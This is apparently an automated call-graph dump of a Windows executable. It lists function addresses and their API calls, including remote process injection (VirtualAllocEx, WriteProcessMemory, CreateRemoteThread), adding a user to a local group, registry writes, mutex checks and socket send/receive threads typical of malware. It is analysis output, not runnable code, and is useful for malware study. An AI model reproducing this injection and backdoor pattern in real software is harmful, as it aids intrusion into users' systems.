HeapAlloc 11651->11673 11653 40155d 11653->11618 11654 405f53 GetProcessHeap HeapAlloc 11653->11654 11654->11621 11674 405f53 GetProcessHeap HeapAlloc 11655->11674 11657 412c88 11657->11624 11658 405ca3 3 API calls 11660 412c60 11658->11660 11659 402481 2 API calls 11659->11660 11660->11657 11660->11658 11660->11659 11662 40144a 11661->11662 11664 4014f4 11661->11664 11675 405f53 GetProcessHeap HeapAlloc 11662->11675 11665 403437 3 API calls 11664->11665 11666 401510 11665->11666 11676 405ea5 VirtualFree 11666->11676 11668 40152d 11668->11624 11669 4014e2 11669->11664 11672 401aa8 VirtualFree 11669->11672 11670 401473 11670->11669 11671 403437 3 API calls 11670->11671 11671->11670 11672->11664 11673->11653 11674->11660 11675->11670 11676->11668 11678 405ca3 3 API calls 11677->11678 11679 401596 11678->11679 11680 40362d 3 API calls 11679->11680 11681 4015a6 11680->11681 11681->11636 11682->11648 11684 401aa0 11683->11684 11685 401a91 11683->11685 11684->10627 11685->11684 11689 4013ef 11685->11689 11687->10630 11688->10632 11696 405ea5 VirtualFree 11689->11696 11691 4013fa 11697 405ea5 VirtualFree 11691->11697 11693 401406 11698 405ea5 VirtualFree 11693->11698 11695 401411 11695->11685 11696->11691 11697->11693 11698->11695 11700 401f90 11699->11700 11701 401f7e TerminateThread CloseHandle 11699->11701 11700->10636 11701->11700 11702->10639 11703->10641 11705 40362d 3 API calls 11704->11705 11706 40279c 11705->11706 11706->10649 11723 405eff GetProcessHeap RtlAllocateHeap 11707->11723 11709 40d382 11710 403125 4 API calls 11709->11710 11711 40d397 11710->11711 11712 403125 4 API calls 11711->11712 11713 40d3aa 11712->11713 11724 401f4b CreateThread 11713->11724 11715 40d3c5 11716 40d3d5 11715->11716 11717 40d3cc CloseHandle 11715->11717 11725 405ea5 VirtualFree 11716->11725 11717->11716 11719 40d3dd 11726 405ea5 VirtualFree 11719->11726 11721 40d3e5 11721->10652 11722->10654 11723->11709 11724->11715 11725->11719 11726->11721 11728 4035e5 4 API calls 11727->11728 11729 40de39 RegOpenKeyExW 11728->11729 11730 40de5b 11729->11730 11732 40de8b 11729->11732 11731 4035e5 4 API calls 11730->11731 11733 40de6c 11731->11733 11734 403036 2 API calls 11732->11734 11735 410fc3 12 API calls 11733->11735 11736 40de95 11734->11736 11737 40de75 11735->11737 11809 405ea5 VirtualFree 11736->11809 11808 405ea5 VirtualFree 11737->11808 11740 40de9d 11742 410fae RegCloseKey 11740->11742 11741 40de7f 11743 40de83 11741->11743 11744 40deab 11741->11744 11745 40dea5 11742->11745 11747 410fae RegCloseKey 11743->11747 11746 402ecf 8 API calls 11744->11746 11745->10658 11745->10659 11748 40debc 11746->11748 11747->11732 11810 403248 lstrcmpW 11748->11810 11750 40dec3 11811 405ea5 VirtualFree 11750->11811 11753 4116b4 11752->11753 11754 4116a4 11752->11754 11756 410fc3 12 API calls 11753->11756 11755 40362d 3 API calls 11754->11755 11757 4116b0 11755->11757 11758 4116c0 11756->11758 11813 405ea5 VirtualFree 11757->11813 11759 4116e1 11758->11759 11762 402ecf 8 API calls 11758->11762 11760 40362d 3 API calls 11759->11760 11760->11757 11764 4116d0 11762->11764 11763 4116f7 11765 403036 2 API calls 11763->11765 11766 403437 3 API calls 11764->11766 11767 40e472 11765->11767 11768 4116d9 11766->11768 11767->10670 11812 405ea5 VirtualFree 11768->11812 11770->10680 11771->10686 11772->10708 11773->10713 11775 40362d 3 API calls 11774->11775 11776 404bae 11775->11776 11777 40362d 3 API calls 11776->11777 11778 404bb9 11777->11778 11778->10750 11814 405ea5 VirtualFree 11779->11814 11781 404b7f 11815 405ea5 VirtualFree 11781->11815 11783 404b8b 11784 405ea5 VirtualFree 11783->11784 11784->10760 11785->10762 11787 40f4f0 GetProcAddress 11786->11787 11788 40f500 11786->11788 11787->11788 11788->10669 11789->10702 11790->10714 11792 40d464 11791->11792 11796 40d48b 11791->11796 11816 40f56d 11792->11816 11796->10721 11796->10722 11798 40e688 11797->11798 11799 411668 11797->11799 11805 405ea5 VirtualFree 11798->11805 11800 403221 7 API calls 11799->11800 11801 411676 11800->11801 11802 411039 RegSetValueExW 11801->11802 11803 411681 11802->11803 11804 403036 2 API calls 11803->11804 11804->11798 11805->10743 11806->10755 11807->10759 11808->11741 11809->11740 11810->11750 11811->11732 11812->11759 11813->11763 11814->11781 11815->11783 11817 401052 11816->11817 11818 40f5a1 AllocateAndInitializeSid 11817->11818 11819 40f5f1 GetLastError 11818->11819 11820 40f5cc LookupAccountSidW 11818->11820 11821 40f5f7 11819->11821 11820->11819 11820->11821 11822 40f605 11821->11822 11823 40f5fc FreeSid 11821->11823 11824 4035e5 4 API calls 11822->11824 11823->11822 11825 40d471 NetLocalGroupAddMembers 11824->11825 11826 405ea5 VirtualFree 11825->11826 11826->11796 11827->10765 11828->10774 11829->10776 11830->10788 11832 403530 11831->11832 11833 403525 PathFindExtensionW 11831->11833 11834 4035e5 4 API calls 11832->11834 11833->11832 11835 40282e 11834->11835 11835->10793 11836->10796 11837->10798 11838->10802 11839->10808 11840->10815 11847 405eff GetProcessHeap RtlAllocateHeap 11841->11847 11843 413df4 11848 401f4b CreateThread 11843->11848 11845 402742 11846 405ea5 VirtualFree 11845->11846 11846->10821 11847->11843 11848->11845 11850 401875 2 API calls 11849->11850 11851 403be2 11850->11851 11852 403437 3 API calls 11851->11852 11853 403bee 11852->11853 11866 401bed 11853->11866 11857 403c08 11858 402bc3 11857->11858 11859 401ad5 VirtualFree 11857->11859 11858->10833 11859->11858 11861 403ba2 11860->11861 11862 403b9c 11860->11862 11873 405ea5 VirtualFree 11861->11873 11863 401ad5 VirtualFree 11862->11863 11863->11861 11865 402bd3 11865->10837 11865->10838 11867 401875 2 API calls 11866->11867 11870 401bfa 11867->11870 11868 401c1f 11872 405ea5 VirtualFree 11868->11872 11869 4018c2 6 API calls 11869->11870 11870->11868 11870->11869 11871 401776 6 API calls 11870->11871 11871->11870 11872->11857 11873->11865 11875 411eb6 11874->11875 11875->11875 11876 411ec3 VirtualProtect 11875->11876 11876->10843 11878 407b09 11877->11878 11881 407b0e 11877->11881 11910 408617 GetCurrentProcess IsWow64Process GetProcessHeap 11878->11910 11880 407b23 OpenProcess 11883 407b40 11880->11883 11886 402617 11880->11886 11881->11880 11911 407948 11881->11911 11920 408633 11883->11920 11886->10848 11889 408633 7 API calls 11890 407b86 11889->11890 11890->11886 11936 408568 11890->11936 11892 407bc5 11892->11886 11893 408568 7 API calls 11892->11893 11894 407bf3 11893->11894 11894->11886 11944 4086e1 11894->11944 11897 407a0c OpenProcess 11896->11897 11898 4079fe 11896->11898 11899 407a2a VirtualAllocEx 11897->11899 11901 407a22 11897->11901 11980 408617 GetCurrentProcess IsWow64Process GetProcessHeap 11898->11980 11899->11901 11902 407a4a VirtualProtectEx VirtualAllocEx 11899->11902 11901->10848 11902->11901 11904 407a80 11902->11904 11903 407a03 11903->11897 11905 407a92 WriteProcessMemory 11904->11905 11905->11901 11906 407aa7 11905->11906 11906->11901 11907 407ab7 WriteProcessMemory 11906->11907 11907->11901 11908 407acf 11907->11908 11908->11901 11909 407ad4 CreateRemoteThread 11908->11909 11909->11901 11910->11881 11912 40f7e0 2 API calls 11911->11912 11913 40795e VirtualAlloc GetWindowsDirectoryA lstrlenA 11912->11913 11914 407995 11913->11914 11915 4079a1 CreateProcessA 11914->11915 11916 4079db 11915->11916 11917 4079cb Sleep 11915->11917 11919 40f7b9 2 API calls 11916->11919 11918 4079e3 11917->11918 11918->11880 11919->11918 11921 408653 11920->11921 11924 408668 11920->11924 11921->11924 11952 407fc0 11921->11952 11927 407b50 11924->11927 11960 407cb7 11924->11960 11927->11886 11928 40878c 11927->11928 11929 4087a7 11928->11929 11932 4087bc 11928->11932 11930 407fc0 4 API calls 11929->11930 11929->11932 11931 4087b0 11930->11931 11933 407c1d 4 API calls 11931->11933 11934 407cb7 3 API calls 11932->11934 11935 407b71 11932->11935 11933->11932 11934->11935 11935->11889 11937 408586 11936->11937 11939 40859b 11936->11939 11938 407fc0 4 API calls 11937->11938 11937->11939 11940 40858f 11938->11940 11942 407cb7 3 API calls 11939->11942 11943 4085f9 11939->11943 11941 407c1d 4 API calls 11940->11941 11941->11939 11942->11943 11943->11892 11945 40870c 11944->11945 11948 408721 11944->11948 11946 407fc0 4 API calls 11945->11946 11945->11948 11947 408715 11946->11947 11950 407c1d 4 API calls 11947->11950 11949 407cb7 3 API calls 11948->11949 11951 408773 11948->11951 11949->11951 11950->11948 11951->11886 11953 407fd0 11952->11953 11954 407fd9 11952->11954 11953->11954 11964 407fe6 11953->11964 11956 407c1d 11954->11956 11957 407c31 11956->11957 11959 407c3e 11956->11959 11957->11959 11977 407d1c 11957->11977 11959->11924 11961 407cc3 11960->11961 11962 407ccd GetModuleHandleW GetProcAddress GetProcAddress 11960->11962 11961->11962 11963 407d06 11961->11963 11962->11963 11963->11927 11965 407fff 11964->11965 11966 40817d 11964->11966 11965->11966 11968 408246 11965->11968 11971 401085 GetProcessHeap RtlAllocateHeap 11965->11971 11972 401f2c 11965->11972 11966->11954 11969 401f2c 2 API calls 11968->11969 11969->11966 11971->11965 11973 401f36 11972->11973 11975 401f43 11972->11975 11973->11975 11976 401099 GetProcessHeap HeapFree 11973->11976 11975->11965 11976->11975 11978 407fc0 4 API calls 11977->11978 11979 407d2d 11978->11979 11979->11959 11980->11903 11981->10856 11987 40f432 11982->11987 11984 4026b0 11985 405ea5 VirtualFree 11984->11985 11985->10869 11986->10871 11994 401085 GetProcessHeap RtlAllocateHeap 11987->11994 11989 40f443 11990 40f473 11989->11990 11991 40f44e lstrcpyA CreateThread 11989->11991 11995 401099 GetProcessHeap HeapFree 11990->11995 11993 40f479 11991->11993 11996 40ee44 WSAStartup 11991->11996 11993->11984 11994->11989 11995->11993 12003 40ee9a socket gethostbyname 11996->12003 11999 40ee74 WSACleanup 12000 40ee7a 11999->12000 12009 40ef4f 12000->12009 12023 40102c 12003->12023 12005 40eed6 htons 12006 40eeff 12005->12006 12007 40ee6d 12006->12007 12008 40ef24 connect 12006->12008 12007->11999 12007->12000 12008->12007 12008->12008 12021 40ef66 12009->12021 12011 40ee95 12013 40f131 send 12013->12021 12016 40f1da 5 API calls 12018 40f0fa CreateThread 12016->12018 12018->12021 12056 40f16e 12018->12056 12021->12011 12021->12013 12021->12016 12022 40f089 getaddrinfo 12021->12022 12025 405f53 GetProcessHeap HeapAlloc 12021->12025 12026 40f1da 12021->12026 12032 40f3bd socket connect 12021->12032 12034 401085 GetProcessHeap RtlAllocateHeap 12021->12034 12035 40f33c socket 12021->12035 12039 401099 GetProcessHeap HeapFree 12021->12039 12040 40f23d 12021->12040 12022->12021 12024 40103b 12023->12024 12024->12005 12024->12024 12025->12021 12051 401085 GetProcessHeap RtlAllocateHeap 12026->12051 12028 40f1f3 12029 40f21d send 12028->12029 12052 401099 GetProcessHeap HeapFree 12029->12052 12031 40f237 12031->12021 12033 40f401 12032->12033 12033->12021 12034->12021 12036 40102c 12035->12036 12037 40f370 connect 12036->12037 12038 40f389 12037->12038 12038->12021 12039->12021 12053 401085 GetProcessHeap RtlAllocateHeap 12040->12053 12042 40f259 12054 401085 GetProcessHeap RtlAllocateHeap 12042->12054 12044 40f27a recv 12045 40f32b 12044->12045 12046 40f262 12044->12046 12045->12021 12046->12044 12046->12045 12049 40f2b8 12046->12049 12047 40f2e2 recv 12047->12045 12047->12049 12048 40f317 12055 401099 GetProcessHeap HeapFree 12048->12055 12049->12045 12049->12047 12049->12048 12051->12028 12052->12031 12053->12042 12054->12046 12055->12045 12059 40f184 12056->12059 12063 40f1c5 12056->12063 12058 40f18f recv 12058->12059 12060 40f1c7 closesocket 12058->12060 12059->12060 12062 40f1da 5 API calls 12059->12062 12059->12063 12065 401085 GetProcessHeap RtlAllocateHeap 12059->12065 12066 401099 GetProcessHeap HeapFree 12059->12066 12067 401099 GetProcessHeap HeapFree 12060->12067 12062->12059 12065->12058 12066->12059 12067->12063 12071 405ea5 VirtualFree 12068->12071 12070 402989 12070->10322 12071->12070 12072->10880 12074 410f54 RegDeleteValueW 12073->12074 12075 410f65 12073->12075 12074->12075 12076 405ea5 VirtualFree 12075->12076 12076->10892 12077 40120d 12080 40c98b 12077->12080 12083 402110 12080->12083 12086 405f53 GetProcessHeap HeapAlloc 12083->12086 12085 401212 12086->12085 12095 413417 12098 402093 12095->12098 12099 402110 2 API calls 12098->12099 12101 4020ae 12099->12101 12100 4020d1 12101->12100 12104 402164 12101->12104 12109 401fcb 12101->12109 12105 405ca3 3 API calls 12104->12105 12106 402179 12105->12106 12121 401f95 12106->12121 12110 401fe1 12109->12110 12118 402064 12109->12118 12128 405f53 GetProcessHeap HeapAlloc 12110->12128 12112 4020da 3 API calls 12113 402081 12112->12113 12114 4013ef VirtualFree 12113->12114 12115 40208c 12114->12115 12115->12101 12116 402058 12116->12118 12120 401a7e VirtualFree 12116->12120 12117 40200a 12117->12116 12129 4020da 12117->12129 12118->12112 12120->12118 12122 40362d 3 API calls 12121->12122 12123 401fa5 12122->12123 12124 40362d 3 API calls 12123->12124 12125 401fb1 12124->12125 12126 40362d 3 API calls 12125->12126 12127 401fbd 12126->12127 12127->12101 12128->12117 12130 403437 3 API calls 12129->12130 12131 4020ea 12130->12131 12132 403437 3 API calls 12131->12132 12133 4020f6 12132->12133 12134 403437 3 API calls 12133->12134 12135 402102 12134->12135 12135->12117 13445 40ed1f 13446 4033f5 3 API calls 13445->13446 13447 40ed35 13446->13447 13448 404a75 10 API calls 13447->13448 13449 40ed3d 13448->13449 13450 404f2b 15 API calls 13449->13450 13451 40ed46 13450->13451 13452 404a17 VirtualFree 13451->13452 13453 40ed4e 13452->13453 13456 405ea5 VirtualFree 13453->13456 13455 40ed56 13456->13455 9820 40122b 9823 40e703 InitializeCriticalSection 9820->9823 9875 405f53 GetProcessHeap HeapAlloc 9823->9875 9825 40e752 9876 4032ff 9825->9876 9828 4032ff 9 API calls 9829 40e79b 9828->9829 9830 4035e5 4 API calls 9829->9830 9831 40e7a8 9830->9831 9886 4031d4 9831->9886 9834 403437 3 API calls 9835 40e7bd 9834->9835 9891 405ea5 VirtualFree 9835->9891 9837 40e7c5 9892 405ea5 VirtualFree 9837->9892 9839 40e7d0 9893 40fc58 GetCurrentProcess 9839->9893 9842 40e7da 9844 4032ff 9 API calls 9842->9844 9843 40e80f 9845 4031d4 5 API calls 9843->9845 9846 40e7e6 9844->9846 9847 40e819 9845->9847 9848 4031d4 5 API calls 9846->9848 9849 403437 3 API calls 9847->9849 9851 40e7f0 9848->9851 9850 40e826 9849->9850 9898 405ea5 VirtualFree 9850->9898 9853 403437 3 API calls 9851->9853 9855 40e7fd 9853->9855 9854 40e80d 9856 40346a 9 API calls 9854->9856 9896 405ea5 VirtualFree 9855->9896 9858 40e83b 9856->9858 9860 40346a 9 API calls 9858->9860 9859 40e805 9861 4032ff 9 API calls 9859->9861 9862 40e843 9860->9862 9861->9854 9863 40346a 9 API calls 9862->9863 9864 40e852 9863->9864 9897 40f71f SHCreateDirectoryExW 9864->9897 9866 40e859 9867 403437 3 API calls 9866->9867 9868 40e866 9867->9868 9869 40346a 9 API calls 9868->9869 9870 40e872 9869->9870 9871 40346a 9 API calls 9870->9871 9872 40e87f 9871->9872 9873 40346a 9 API calls 9872->9873 9874 401230 9873->9874 9875->9825 9877 40330b 9876->9877 9880 403310 9876->9880 9900 405ea5 VirtualFree 9877->9900 9879 4035e5 4 API calls 9881 40331e 9879->9881 9880->9879 9882 403335 5 API calls 9881->9882 9883 403326 9882->9883 9899 405ea5 VirtualFree 9883->9899 9885 40332e 9885->9828 9887 401052 9886->9887 9888 4031f6 ExpandEnvironmentStringsW 9887->9888 9889 4035e5 4 API calls 9888->9889 9890 40321b 9889->9890 9890->9834 9891->9837 9892->9839 9901 410c36 GetModuleHandleA GetProcAddress 9893->9901 9896->9859 9897->9866 9898->9854 9899->9885 9900->9880 9902 40e7d5 9901->9902 9902->9842 9902->9843 13469 410b2a 13470 41094e GetPEB 13469->13470 13471 410b36 13470->13471 13472 410969 lstrcmpA 13471->13472 13474 410b43 13472->13474 13473 410bd6 13474->13473 13475 4107c4 2 API calls 13474->13475 13476 410b65 MessageBoxA 13475->13476 13477 4035e5 4 API calls 13476->13477 13478 410b8b 13477->13478 13479 410bd9 CreateProcessW 13478->13479 13480 410b94 13479->13480 13492 405ea5 VirtualFree 13480->13492 13482 410b9c 13493 405ea5 VirtualFree 13482->13493 13484 410ba6 13485 4035e5 4 API calls 13484->13485 13486 410bbb 13485->13486 13487 410bd9 CreateProcessW 13486->13487 13488 410bc4 13487->13488 13494 405ea5 VirtualFree 13488->13494 13490 410bcc 13495 405ea5 VirtualFree 13490->13495 13492->13482 13493->13484 13494->13490 13495->13473 13496 401b2b 13499 4037c0 13496->13499 13502 405ea5 VirtualFree 13499->13502 13501 401b33 13502->13501 12317 401c36 12320 405ea5 VirtualFree 12317->12320 12319 401c47 12320->12319 13533 40813c 13535 408148 13533->13535 13534 40817d 13535->13534 13537 408246 13535->13537 13539 401f2c 2 API calls 13535->13539 13540 401085 GetProcessHeap RtlAllocateHeap 13535->13540 13538 401f2c 2 API calls 13537->13538 13538->13534 13539->13535 13540->13535 9903 409fce 9904 405ea5 VirtualFree 9903->9904 9905 409fd9 9903->9905 13643 4037d7 13644 411dc0 11 API calls 13643->13644 13645 4037ef 13644->13645 13646 403437 3 API calls 13645->13646 13647 4037f9 13646->13647 13650 405ea5 VirtualFree 13647->13650 13649 403801 13650->13649 12331 4136d9 12332 401052 12331->12332 12333 413701 SHGetFolderPathW lstrcatW 12332->12333 12334 40346a 9 API calls 12333->12334 12335 413737 12334->12335 12336 403761 7 API calls 12335->12336 12337 413757 12336->12337 12338 403679 8 API calls 12337->12338 12339 41375e 12338->12339 12340 403665 2 API calls 12339->12340 12341 413766 12340->12341 12344 405ea5 VirtualFree 12341->12344 12343 41376e 12344->12343 12352 4136e0 12353 413701 SHGetFolderPathW lstrcatW 12352->12353 12354 401052 12352->12354 12355 40346a 9 API calls 12353->12355 12354->12353 12356 413737 12355->12356 12357 403761 7 API calls 12356->12357 12358 413757 12357->12358 12359 403679 8 API calls 12358->12359 12360 41375e 12359->12360 12361 403665 2 API calls 12360->12361 12362 413766 12361->12362 12365 405ea5 VirtualFree 12362->12365 12364 41376e 12365->12364 8642 405ce2 GetCommandLineA 8643 405cf7 GetStartupInfoA 8642->8643 8651 405d70 8643->8651 8646 405d43 8647 405d52 GetModuleHandleA 8646->8647 8654 413435 8647->8654 8711 405c8e GetProcessHeap HeapAlloc 8651->8711 8653 405d7f 8653->8646 8655 41345b 8654->8655 8656 413467 GetTickCount 8655->8656 8712 4010ad 8656->8712 8658 413473 GetModuleFileNameA 8713 411e21 8658->8713 8660 4136ad 8996 4110d7 8660->8996 8663 41349d 8663->8660 8720 401085 GetProcessHeap RtlAllocateHeap 8663->8720 8667 4134c7 8668 4134e3 CreateEventA GetLastError 8667->8668 8668->8660 8669 413506 8668->8669 8669->8660 8670 413512 RegCreateKeyExA RegSetValueExA RegSetValueExA RegCloseKey 8669->8670 8721 405a10 Sleep 8670->8721 8711->8653 8712->8658 9094 401085 GetProcessHeap RtlAllocateHeap 8713->9094 8715 411e36 CreateFileA 8716 411e5b 8715->8716 8717 411e5e GetFileSize ReadFile 8715->8717 8716->8717 8718 411e7c 8717->8718 8719 411e7e CloseHandle 8717->8719 8718->8719 8719->8663 8720->8667 9095 41044f 8721->9095 8723 405a34 9100 410346 8723->9100 8731 405a67 9130 40304c 8731->9130 8733 405a73 9133 402e93 8733->9133 8735 405a7f 9137 403036 8735->9137 8997 4110e1 8996->8997 8998 4110e6 8996->8998 8999 410fae RegCloseKey 8997->8999 9538 405c16 8998->9538 8999->8998 9094->8715 9187 40fece 9095->9187 9099 410477 9099->8723 9101 410362 9100->9101 9112 405a42 9100->9112 9102 410381 9101->9102 9103 4103df 9101->9103 9101->9112 9192 402f91 9102->9192 9105 402f91 6 API calls 9103->9105 9103->9112 9109 4103fd 9105->9109 9107 410ac3 6 API calls 9107->9109 9108 410397 9108->9112 9195 410ac3 9108->9195 9199 402296 9108->9199 9109->9107 9111 402296 6 API calls 9109->9111 9109->9112 9111->9109 9113 4033bf lstrlenA 9112->9113 9114 4033d2 lstrlenA 9113->9114 9115 4033ee 9113->9115 9221 405e22 VirtualAlloc 9114->9221 9118 4102b9 9115->9118 9117 4033e2 lstrcpyA 9117->9115 9120 4102cb 9118->9120 9127 405a5f 9118->9127 9122 4033bf 4 API calls 9120->9122 9125 403036 2 API calls 9120->9125 9126 410330 9120->9126 9120->9127 9223 405ca3 LoadLibraryA GetProcAddress 9120->9223 9228 410af9 9120->9228 9231 4033a3 lstrcmpA 9120->9231 9232 405ea5 VirtualFree 9120->9232 9122->9120 9125->9120 9233 40239e 9126->9233 9129 405ea5 VirtualFree 9127->9129 9129->8731 9238 405eff GetProcessHeap RtlAllocateHeap 9130->9238 9132 40305e 9132->8733 9134 402eab 9133->9134 9136 402eb0 9133->9136 9239 405eff GetProcessHeap RtlAllocateHeap 9134->9239 9136->8735 9138 403044 9137->9138 9139 40303f 9137->9139 9141 40595e 9138->9141 9240 405eee GetProcessHeap HeapFree 9139->9240 9241 402e4c 9141->9241 9144 40304c 2 API calls 9145 405991 9144->9145 9248 405911 9145->9248 9191 410298 CreateMutexA 9187->9191 9189 40fede 9190 405f53 GetProcessHeap HeapAlloc 9189->9190 9190->9099 9191->9189 9211 405ec5 9192->9211 9194 402fa7 9194->9108 9196 410adc 9195->9196 9197 402f91 6 API calls 9196->9197 9198 410af1 9197->9198 9198->9108 9200 4022b0 9199->9200 9202 402364 9199->9202 9220 405f53 GetProcessHeap HeapAlloc 9200->9220 9203 402e93 2 API calls 9202->9203 9204 40238c 9203->9204 9205 403036 2 API calls 9204->9205 9206 402397 9205->9206 9206->9108 9207 402355 9207->9202 9209 401e71 2 API calls 9207->9209 9208 4022d9 9208->9207 9210 402e93 2 API calls 9208->9210 9209->9202 9210->9208 9212 405ed0 9211->9212 9213 405ec9 GetProcessHeap RtlAllocateHeap 9211->9213 9215 405ed4 9212->9215 9216 405edc GetProcessHeap HeapReAlloc 9212->9216 9213->9194 9219 405eee GetProcessHeap HeapFree 9215->9219 9216->9194 9218 405ed9 9218->9194 9219->9218 9220->9208 9222 405e40 9221->9222 9222->9117 9224 405ce1 9223->9224 9225 405cc2 9223->9225 9224->9120 9226 405cc6 9225->9226 9227 405cd9 ExitProcess 9225->9227 9226->9227 9229 402e93 2 API calls 9228->9229 9230 410b21 9229->9230 9230->9120 9231->9120 9232->9120 9234 405ca3 3 API calls 9233->9234 9235 4023b3 9234->9235 9236 410af9 2 API calls 9235->9236 9237 4023c1 9236->9237 9237->9127 9238->9132 9239->9136 9240->9138 9269 405eff GetProcessHeap RtlAllocateHeap 9241->9269 9243 402e5b 9244 402f91 6 API calls 9243->9244 9245 402e84 9244->9245 9270 405eee GetProcessHeap HeapFree 9245->9270 9247 402e8b 9247->9144 9249 405923 9248->9249 9250 405945 9248->9250 9251 402e4c 8 API calls 9249->9251 9252 40304c 2 API calls 9250->9252 9253 405935 9251->9253 9254 405955 9252->9254 9255 402e93 2 API calls 9253->9255 9258 4060aa 9254->9258 9256 40593d 9255->9256 9257 403036 2 API calls 9256->9257 9257->9250 9259 40304c 2 API calls 9258->9259 9260 4060c2 9259->9260 9261 40304c 2 API calls 9260->9261 9262 406102 9261->9262 9263 403036 2 API calls 9262->9263 9264 40610a 9263->9264 9265 403036 2 API calls 9264->9265 9266 406112 9265->9266 9267 403036 2 API calls 9266->9267 9268 4059a3 9267->9268 9269->9243 9270->9247 9539 403036 2 API calls 9538->9539 9540 405c22 9539->9540 9551 405ea5 VirtualFree 9540->9551 9542 405c2a 9552 405ea5 VirtualFree 9542->9552 9544 405c37 9553 405ea5 VirtualFree 9544->9553 9546 405c42 9554 405ea5 VirtualFree 9546->9554 9548 405c4d 9555 405ea5 VirtualFree 9548->9555 9550 405c58 9551->9542 9552->9544 9553->9546 9554->9548 9555->9550 10008 4011ef 10011 412408 10008->10011 10018 410298 CreateMutexA 10011->10018 10013 41241d 10019 405f53 GetProcessHeap HeapAlloc 10013->10019 10015 4011f4 10016 412425 10016->10015 10020 412ed4 10016->10020 10018->10013 10019->10016 10032 405f53 GetProcessHeap HeapAlloc 10020->10032 10022 412ef4 10033 405f53 GetProcessHeap HeapAlloc 10022->10033 10024 412f1e 10025 412f2a 10024->10025 10043 41266a 10024->10043 10034 41290f CoInitialize CoCreateInstance 10025->10034 10029 412f4a 10029->10015 10030 412f3c 10030->10029 10046 41273a CoInitialize CoCreateInstance 10030->10046 10032->10022 10033->10024 10035 412a66 10034->10035 10041 41294f 10034->10041 10035->10029 10035->10030 10037 412996 VariantInit 10037->10041 10038 412a40 CoUninitialize 10038->10035 10041->10035 10041->10037 10041->10038 10041->10041 10057 405f53 GetProcessHeap HeapAlloc 10041->10057 10058 412bc7 10041->10058 10063 402481 10041->10063 10044 412bc7 2 API calls 10043->10044 10045 41267b 10044->10045 10045->10025 10047 412786 10046->10047 10048 4128aa CoUninitialize 10046->10048 10047->10048 10070 412a6b 10047->10070 10048->10030 10051 4127b0 10051->10048 10052 4127b9 CoCreateInstance 10051->10052 10052->10048 10053 4127d7 10052->10053 10053->10048 10074 4124eb 10053->10074 10057->10041 10067 405df1 GetProcessHeap HeapAlloc 10058->10067 10060 412bd2 10068 405df1 GetProcessHeap HeapAlloc 10060->10068 10062 412bde 10062->10041 10064 402490 10063->10064 10066 4024ad 10063->10066 10069 405f53 GetProcessHeap HeapAlloc 10064->10069 10066->10041 10067->10060 10068->10062 10069->10066 10084 412447 CoInitialize CoCreateInstance 10070->10084 10072 412a7d CoCreateInstance 10073 412aa6 10072->10073 10073->10051 10075 412505 10074->10075 10076 4124f6 CoTaskMemFree 10074->10076 10077 412b2a 10075->10077 10076->10075 10078 405ca3 3 API calls 10077->10078 10079 412b40 10078->10079 10080 405ca3 3 API calls 10079->10080 10081 412b57 10080->10081 10082 405ca3 3 API calls 10081->10082 10083 412b90 10082->10083 10083->10048 10085 4124df CoUninitialize 10084->10085 10086 41247b 10084->10086 10085->10072 10086->10085 9906 4011fe 9909 413b3c 9906->9909 9982 402550 9909->9982 9912 402550 VirtualAlloc 9913 413b59 9912->9913 9914 402550 VirtualAlloc 9913->9914 9915 413b63 9914->9915 9916 402550 VirtualAlloc 9915->9916 9917 413b6d 9916->9917 9918 402550 VirtualAlloc 9917->9918 9919 413b77 9918->9919 9920 402550 VirtualAlloc 9919->9920 9921 413b81 9920->9921 9985 401085 GetProcessHeap RtlAllocateHeap 9921->9985 9923 413ba8 9986 401085 GetProcessHeap RtlAllocateHeap 9923->9986 9925 413bb1 9987 401085 GetProcessHeap RtlAllocateHeap 9925->9987 9927 413bba 9988 401085 GetProcessHeap RtlAllocateHeap 9927->9988 9929 413bc3 9989 401085 GetProcessHeap RtlAllocateHeap 9929->9989 9931 413bcd 9990 401085 GetProcessHeap RtlAllocateHeap 9931->9990 9933 413bd7 9991 411ce2 9933->9991 9936 411ce2 2 API calls 9937 413be8 9936->9937 9938 411ce2 2 API calls 9937->9938 9939 413bef 9938->9939 9940 411ce2 2 API calls 9939->9940 9941 413bf7 9940->9941 9942 411ce2 2 API calls 9941->9942 9943 413bff 9942->9943 9944 411ce2 2 API calls 9943->9944 9945 413c07 9944->9945 9946 4033bf 4 API calls 9945->9946 9947 413c13 9946->9947 9995 40fda5 9947->9995 9949 413c1e 9998 405ea5 VirtualFree 9949->9998 9951 413c26 9952 4033bf 4 API calls 9951->9952 9953 413c30 9952->9953 9954 40fda5 5 API calls 9953->9954 9955 413c3b 9954->9955 9999 405ea5 VirtualFree 9955->9999 9957 413c43 9958 4033bf 4 API calls 9957->9958 9959 413c4d 9958->9959 9960 40fda5 5 API calls 9959->9960 9961 413c58 9960->9961 10000 405ea5 VirtualFree 9961->10000 9963 413c60 9964 4033bf 4 API calls 9963->9964 9965 413c6c 9964->9965 9966 40fda5 5 API calls 9965->9966 9967 413c77 9966->9967 10001 405ea5 VirtualFree 9967->10001 9969 413c7f 9970 4033bf 4 API calls 9969->9970 9971 413c8b 9970->9971 9972 40fda5 5 API calls 9971->9972 9973 413c96 9972->9973 10002 405ea5 VirtualFree 9973->10002 9975 413c9e 10004 40fdd1 9982->10004 9985->9923 9986->9925 9987->9927 9988->9929 9989->9931 9990->9933 9993 411ce8 9991->9993 9994 411d05 9993->9994 10007 411d0c Sleep GetTickCount 9993->10007 9994->9936 9996 403125 4 API calls 9995->9996 9997 40fdb7 CreateEventA 9996->9997 9997->9949 9998->9951 9999->9957 10000->9963 10001->9969 10002->9975 10005 4031c3 VirtualAlloc 10004->10005 10006 402563 10005->10006 10006->9912 10007->9993 12980 407e82 12987 401085 GetProcessHeap RtlAllocateHeap 12980->12987 12982 407e96 12983 407f94 12982->12983 12988 401085 GetProcessHeap RtlAllocateHeap 12982->12988 12985 407ed0 12986 401f2c 2 API calls 12985->12986 12986->12983 12987->12982 12988->12985 12989 401c87 12992 403de2 12989->12992 12993 403036 2 API calls 12992->12993 12994 403df3 12993->12994 12997 405ea5 VirtualFree 12994->12997 12996 401c97 12997->12996 12998 403c8f 12999 411dc0 11 API calls 12998->12999 13000 403ca8 12999->13000 13001 403554 11 API calls 13000->13001 13002 403cb5 13001->13002 13003 403125 4 API calls 13002->13003 13004 403cbe 13003->13004 13009 405ea5 VirtualFree 13004->13009 13006 403cc6 13010 405ea5 VirtualFree 13006->13010 13008 403cce 13009->13006 13010->13008 8639 412c91 8640 412c9c 8639->8640 8641 412cfc CoUninitialize 8640->8641 13148 409aa8 13155 405f53 GetProcessHeap HeapAlloc 